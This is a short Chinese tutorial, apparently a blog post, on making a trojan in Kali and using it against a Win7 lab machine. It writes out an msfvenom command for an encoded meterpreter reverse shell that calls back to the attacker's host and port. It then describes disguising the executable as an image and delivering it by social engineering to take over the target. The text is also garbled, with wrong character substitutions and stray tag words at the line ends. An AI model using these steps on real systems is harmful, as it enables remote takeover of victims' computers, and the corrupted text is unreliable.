漏洞復現:使用Kali製做木馬程序windows
攻擊機:Kali2019tcp
靶機:Win7 64位spa
攻擊步驟:3d
1.打開Kali2019和Win7 64位虛擬機,肯定IP地址在一個網段blog
2.肯定好IP地址,進入Kali2019進行木馬文件.exe製做,命令以下圖片
命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe虛擬機
備註:咱們選擇的靶機是Win7 64位,因此兼容性必定要設置好,不然會出錯it
3.接下來打開msf,編輯遠程模塊,設置payload,具體流程看圖io
4.開始設置Payload信息,輸入show options查看,lhost和lport都要設置成exe文件中設置的地址和端口號兼容性
5.輸入exploit開始運行監聽模塊,開始監聽
6.把剛剛生成的pink程序經過壓縮合並,製做一個圖片exe文件,經過社工或者其餘方法上傳到win7 64位虛擬機中
7.運行這個文件,圖片會打開,Kali2019會收到鏈接成功的提示
8.成功獲取win7權限,滲透成功